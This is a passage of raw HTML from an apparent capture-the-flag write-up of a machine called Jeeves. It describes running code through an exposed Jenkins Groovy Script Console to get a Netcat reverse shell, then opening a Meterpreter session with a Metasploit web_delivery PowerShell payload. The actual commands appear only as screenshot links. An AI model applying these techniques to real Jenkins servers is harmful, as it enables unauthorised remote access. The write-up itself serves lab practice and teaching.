&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Going to &lt;b&gt;Manage Jenkins&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOBl5c7mdRBXLK-4sbvkRTq9_ZA78AlAFQgg1mQ7UBJmq6_tx0Wo7YaNma0TyJgGzH_3IcSdEXT8pLQUw-kOYOsdUzK70CAH-5P4NPuD25AjWfTHaat9nDSQhaY9itacCvOoztOV3PvnNr/s1600/screenshot.10.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOBl5c7mdRBXLK-4sbvkRTq9_ZA78AlAFQgg1mQ7UBJmq6_tx0Wo7YaNma0TyJgGzH_3IcSdEXT8pLQUw-kOYOsdUzK70CAH-5P4NPuD25AjWfTHaat9nDSQhaY9itacCvOoztOV3PvnNr/s1600/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Checking the &lt;b&gt;Script Console&lt;/b&gt;&amp;nbsp;there is available a&lt;b&gt; Groovy Script&lt;/b&gt; that allows to write and run code on the server:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEO09kZDJOCPwutlMnCBru3zThLTFfkLJFgC1LRfnoemLCZAQ-gCMt8gT1cTQPdNU9qSqQa1R1ko8rmWidGVhfS1GiFzutETEYvz10B9m58aTg9QZHXGKFWXCwCoEVw0zHG-lH9eKtUlu/s1600/screenshot.11.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEO09kZDJOCPwutlMnCBru3zThLTFfkLJFgC1LRfnoemLCZAQ-gCMt8gT1cTQPdNU9qSqQa1R1ko8rmWidGVhfS1GiFzutETEYvz10B9m58aTg9QZHXGKFWXCwCoEVw0zHG-lH9eKtUlu/s1600/screenshot.11.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXtSMDVEAv308aGL2K3n3LH4RQWuy_y1yoEXEdeGMp6tcpHu8szIJxmz8w-pRpw1SUSOu_lVLP8TrzV4l-sl8jnZ1F8pDNpiYg3s3GizCQeaTOEcGV7EEKHsif6oJ3hmLJnAT3qpod9Tvs/s1600/screenshot.12.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXtSMDVEAv308aGL2K3n3LH4RQWuy_y1yoEXEdeGMp6tcpHu8szIJxmz8w-pRpw1SUSOu_lVLP8TrzV4l-sl8jnZ1F8pDNpiYg3s3GizCQeaTOEcGV7EEKHsif6oJ3hmLJnAT3qpod9Tvs/s1600/screenshot.12.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3.1 - Getting a remote reverse shell&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;-&amp;nbsp;The &lt;b&gt;Apache Groovy&lt;/b&gt; language is a Java-syntax-compatible object-oriented programming language that can be used as both a programming and scripting language for the Java Platform:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk7YDDbEZ0v4btEahJo70ocf4tAVd0ak_ih9dJ9xRguMEmtyBoBmR0KYxCf1JVj2rREm97ZCegTYAXbgBWQSMdbbBEjF5MnIwtD9tFqYe_4u55a7mPFzLqF9Z_VDHnIF5oCOTa8eN6vmHE/s1600/screenshot.13.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;572&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk7YDDbEZ0v4btEahJo70ocf4tAVd0ak_ih9dJ9xRguMEmtyBoBmR0KYxCf1JVj2rREm97ZCegTYAXbgBWQSMdbbBEjF5MnIwtD9tFqYe_4u55a7mPFzLqF9Z_VDHnIF5oCOTa8eN6vmHE/s640/screenshot.13.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- There are multiple available scripts for getting a reverse shell, for instance this one:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSyrv6xLSp5t4mc7f9_UoKVHyhWZ-qGJZKClp26VHOS8FO0S2KF03SJnyz4fu-bctMs5FA_wM3NyvTzs3t0hZh2zwLDhBogYYu61zbA-MrQEhf3U8negulI3QHQTwb0JI6ECHhCC-cwavW/s1600/screenshot.14.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSyrv6xLSp5t4mc7f9_UoKVHyhWZ-qGJZKClp26VHOS8FO0S2KF03SJnyz4fu-bctMs5FA_wM3NyvTzs3t0hZh2zwLDhBogYYu61zbA-MrQEhf3U8negulI3QHQTwb0JI6ECHhCC-cwavW/s1600/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Just setting a &lt;b&gt;Netcat&lt;/b&gt; listener session, adapting the script to our needs and running it:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqT-sH-UgtF7YLqWy58zJDB9b2n3JFHzAF9RuQUU6DRLhq9aWYm5vGnCQNHFoXF0Auh3-DpjPbsQnTc9pexKJxNQOksK5PqYBT5luBRRgkuucm49kgJKmzeHhZdwlw1lx0zF9pxBO0pNv8/s1600/screenshot.16.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqT-sH-UgtF7YLqWy58zJDB9b2n3JFHzAF9RuQUU6DRLhq9aWYm5vGnCQNHFoXF0Auh3-DpjPbsQnTc9pexKJxNQOksK5PqYBT5luBRRgkuucm49kgJKmzeHhZdwlw1lx0zF9pxBO0pNv8/s1600/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxW6kiETVVQNrbAzbpir7aTu8F0dR6FWdtYMuHgLVzVCzYlnj_GxrXK8Cjf4lqbFJkeIqkOQtG_hrrzRw5x4XX-nJvlR59pOvnVO5xU0dKjRHMoC2NGRfrmjnJ0A93GD26JrzSapSH6n_/s1600/screenshot.15.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTxW6kiETVVQNrbAzbpir7aTu8F0dR6FWdtYMuHgLVzVCzYlnj_GxrXK8Cjf4lqbFJkeIqkOQtG_hrrzRw5x4XX-nJvlR59pOvnVO5xU0dKjRHMoC2NGRfrmjnJ0A93GD26JrzSapSH6n_/s1600/screenshot.15.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The consequence is a remote reverse shell:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikQGkMFxhAuVj4WA5_ETOO5_7OuxD2j6xar9UTo3Z-fVF7PsA6Y6KW3kDZIFE0vtudyw10X7IURz8dkzvO9R7l4khFk_fNG3R-iLdeALhV7BT9I4nBYPdKxIiF2YXIpYTgB7rosEOQwXny/s1600/screenshot.18.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikQGkMFxhAuVj4WA5_ETOO5_7OuxD2j6xar9UTo3Z-fVF7PsA6Y6KW3kDZIFE0vtudyw10X7IURz8dkzvO9R7l4khFk_fNG3R-iLdeALhV7BT9I4nBYPdKxIiF2YXIpYTgB7rosEOQwXny/s1600/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The user is &lt;b&gt;kohsuke&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVVhgwjadtjXT4mPXsEtskYXh-vaphYTYkIV9669VdhBZBSmeOr0a1Lhi9zKD6dnEPVxXQXl7bwdhUnC589QkCtSHreqo2c-puLD_epBYnwchsgw-pa-9o1P8ZckR2FK4bEETmV_h9FXFb/s1600/screenshot.20.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVVhgwjadtjXT4mPXsEtskYXh-vaphYTYkIV9669VdhBZBSmeOr0a1Lhi9zKD6dnEPVxXQXl7bwdhUnC589QkCtSHreqo2c-puLD_epBYnwchsgw-pa-9o1P8ZckR2FK4bEETmV_h9FXFb/s1600/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- However it seems that we cannot get out of the current folder due to lack of enough administrative privileges:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj47Z_QAwuX_82ElUwxsVJsBsbUXJ_C7Et2sGtbP9sNF6ol-lhLLVTP2bur0f7XBINzeyMnLYPA0oKt5JkfmE9as8ehkY3vmkp7AeHcv2X9FsbAyJAKcDBhqgFx6Jq0huI1S0fv4W0BJzrv/s1600/screenshot.19.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj47Z_QAwuX_82ElUwxsVJsBsbUXJ_C7Et2sGtbP9sNF6ol-lhLLVTP2bur0f7XBINzeyMnLYPA0oKt5JkfmE9as8ehkY3vmkp7AeHcv2X9FsbAyJAKcDBhqgFx6Jq0huI1S0fv4W0BJzrv/s1600/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;3.2 - Meterpreter session with web_delivery&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Let&#39;s create a &lt;b&gt;web_delivery&lt;/b&gt; exploit on Kali with the purpose of getting a Meterpreter session:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdasEuiuRQszcR5GdH8zROCl3TMeVhkfJRXzmkHx3k0k3jIu6RkuKOVxsV1nCFmJZeqg06Dekk9ptjIhRRaugBCyp6KOJWtC33wWm-7GNwK9mARCHqGTWFpJS51_EUN-aIae9lN8i19wCm/s1600/screenshot.21.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdasEuiuRQszcR5GdH8zROCl3TMeVhkfJRXzmkHx3k0k3jIu6RkuKOVxsV1nCFmJZeqg06Dekk9ptjIhRRaugBCyp6KOJWtC33wWm-7GNwK9mARCHqGTWFpJS51_EUN-aIae9lN8i19wCm/s1600/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Setting all options and running the &lt;b&gt;web_delivery&lt;/b&gt;&amp;nbsp;exploit a Powershell script is created:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyufgjESJeYmOSblixJxVHu732IimvRwfXvrMkL_EygDjw5jfR3Qd8rexaH9zrwhMWyJNoMU90oSMlOf4U3E7-BgkVoE4-su6KK5yOtgrMYJSVhi72l9HOm_C2beeVDQjOBU6PVL44WMYa/s1600/screenshot.22.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyufgjESJeYmOSblixJxVHu732IimvRwfXvrMkL_EygDjw5jfR3Qd8rexaH9zrwhMWyJNoMU90oSMlOf4U3E7-BgkVoE4-su6KK5yOtgrMYJSVhi72l9HOm_C2beeVDQjOBU6PVL44WMYa/s1600/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Now, the Powershell script must be run on the remote reverse shell from &lt;b&gt;Jeeves&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGkG4kWSBTN4XVFqSVEBmWIoWPjpC9u4O7TNBbv9x1SKqZDZ6xRfqa6GiGyw5fEIuLoy0yToMY1wTL3BZxWddLDO51awRpBKXxb6qJHgAbzQtV2WVH28i4WE2Yo2ghmKk79UP07Rxrtn_e/s1600/screenshot.23.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGkG4kWSBTN4XVFqSVEBmWIoWPjpC9u4O7TNBbv9x1SKqZDZ6xRfqa6GiGyw5fEIuLoy0yToMY1wTL3BZxWddLDO51awRpBKXxb6qJHgAbzQtV2WVH28i4WE2Yo2ghmKk79UP07Rxrtn_e/s1600/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- As a consequence a Meterpreter session is opened:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgdKMeowAYnnKbbPOa6MxDCNOA6C0To2dHpc4nkorahLyU52x57LoTSNe9riWhGKBI7Ho34Jpx-0nDZghUK__zTunyiAyHG-zUjANisUFbsC9cx3lr7SQtaHNpss9s9RG1-_UZ5sf1oMbA/s1600/screenshot.24.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgdKMeowAYnnKbbPOa6MxDCNOA6C0To2dHpc4nkorahLyU52x57LoTSNe9riWhGKBI7Ho34Jpx-0nDZghUK__zTunyiAyHG-zUjANisUFbsC9cx3lr7SQtaHNpss9s9RG1-_UZ5sf1oMbA/s1600/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Getting information about the current folder, user and the system:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFxPfVsNiVwsqrfkrkmUD4XbS0QIc8d1h9mmQHirtG8OFpwhiO1l-7YS9qKHSfZkojvEmTHVrUMF3uy_SASgwS-pp4COpRXtBEkEih3ZfOPwGCEjkCdPu5fXY6issMl5qXqRK25d4G02lr/s1600/screenshot.25.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFxPfVsNiVwsqrfkrkmUD4XbS0QIc8d1h9mmQHirtG8OFpwhiO1l-7YS9qKHSfZkojvEmTHVrUMF3uy_SASgwS-pp4COpRXtBEkEih3ZfOPwGCEjkCdPu5fXY6issMl5qXqRK25d4G02lr/s1600/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEVkwueSXiIIE_ypPsCDXOluEAEYnTKDUC2h2tdl6aPOhyYtQV-TBpg-2Ni0D4HLomGeynRESw9aoSIFfdeNQPCMJKC-vBL9OfhPW0u8ZfVvo1kWjUS8pT81-g5LR3Q1ru1-ZZU5p8WneV/s1600/screenshot.27.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEVkwueSXiIIE_ypPsCDXOluEAEYnTKDUC2h2tdl6aPOhyYtQV-TBpg-2Ni0D4HLomGeynRESw9aoSIFfdeNQPCMJKC-vBL9OfhPW0u8ZfVvo1kWjUS8pT81-g5LR3Q1ru1-ZZU5p8WneV/s1600/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
